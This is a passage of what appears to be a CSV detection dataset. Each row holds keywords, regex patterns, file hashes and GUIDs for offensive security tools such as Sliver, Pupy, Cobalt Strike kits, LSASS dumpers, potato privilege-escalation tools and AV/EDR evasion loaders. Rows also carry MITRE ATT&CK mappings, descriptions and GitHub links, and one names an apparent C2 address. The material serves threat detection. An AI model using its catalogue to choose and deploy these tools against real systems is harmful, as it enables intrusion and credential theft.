0xb0,\s0x24,\s0x86,\s0x7e,\s0x79.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*0xbadjuju/Tokenvator*",".{0,1000}0xbadjuju\/Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*0xbadjuju/WheresMyImplant*",".{0,1000}0xbadjuju\/WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*0xdarkvortex-MalwareDevelopment*",".{0,1000}0xdarkvortex\-MalwareDevelopment.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*0xdeadbeef*",".{0,1000}0xdeadbeef.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*0xEr3bus/PoolPartyBof*",".{0,1000}0xEr3bus\/PoolPartyBof.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*0xHossam/Killer*",".{0,1000}0xHossam\/Killer.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*0xIslamTaha/Python-Rootkit*",".{0,1000}0xIslamTaha\/Python\-Rootkit.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*0xless/slip*",".{0,1000}0xless\/slip.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*0xsp-SRD/mortar*",".{0,1000}0xsp\-SRD\/mortar.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*0xthirteen/MoveKit*",".{0,1000}0xthirteen\/MoveKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*0xthirteen/PerfExec*",".{0,1000}0xthirteen\/PerfExec.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*0xthirteen/SharpRDP*",".{0,1000}0xthirteen\/SharpRDP.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*0xthirteen/SharpStay*",".{0,1000}0xthirteen\/SharpStay.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*1$a$$ Dl_lmp in *",".{0,1000}1\$a\$\$\sDl_lmp\sin\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*'1. Set the backdoor'*",".{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*1_FindDomain.sh*",".{0,1000}1_FindDomain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1*",".{0,1000}10119f906ce65acf48767f222524685945f3c25e8531bad35ad485c6e549ccc1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8*",".{0,1000}1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*105C2C6D-1C0A-4535-A231-80E355EFB112*",".{0,1000}105C2C6D\-1C0A\-4535\-A231\-80E355EFB112.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*107EBC1B-0273-4B3D-B676-DE64B7F52B33*",".{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50*",".{0,1000}10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c*",".{0,1000}10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb*",".{0,1000}10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d*",".{0,1000}10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af*",".{0,1000}10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*10k-worst-pass.txt*",".{0,1000}10k\-worst\-pass\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806*",".{0,1000}11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42*",".{0,1000}111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*11385CC1-54B7-4968-9052-DF8BB1961F1E*",".{0,1000}11385CC1\-54B7\-4968\-9052\-DF8BB1961F1E.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5*",".{0,1000}1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461*",".{0,1000}115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17*",".{0,1000}115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b*",".{0,1000}11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*119.45.104.153:8848*",".{0,1000}119\.45\.104\.153\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937*",".{0,1000}11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048*",".{0,1000}11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975*",".{0,1000}11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11f51e1a8f1a630390533599cfbcb78133d680f6*",".{0,1000}11f51e1a8f1a630390533599cfbcb78133d680f6.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203*",".{0,1000}11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b*",".{0,1000}12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*123abcbde966780cef8d9ec24523acac*",".{0,1000}123abcbde966780cef8d9ec24523acac.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*",".{0,1000}124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1250BAE1-D26F-4EF2-9452-9B5009568336*",".{0,1000}1250BAE1\-D26F\-4EF2\-9452\-9B5009568336.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - 
TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7*",".{0,1000}125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*127.0.0.1 is not advisable as a source. 
Use -l 127.0.0.1 to override this warning*",".{0,1000}127\.0\.0\.1\sis\snot\sadvisable\sas\sa\ssource\.\sUse\s\-l\s127\.0\.0\.1\sto\soverride\sthis\swarning.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*127.0.0.1/pipe/coerced\\C$*",".{0,1000}127\.0\.0\.1\/pipe\/coerced\\\\C\$.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*127.0.0.1:#{mitm_port}*",".{0,1000}127\.0\.0\.1\:\#\{mitm_port\}.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*127.0.0.1:1080*",".{0,1000}127\.0\.0\.1\:1080.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 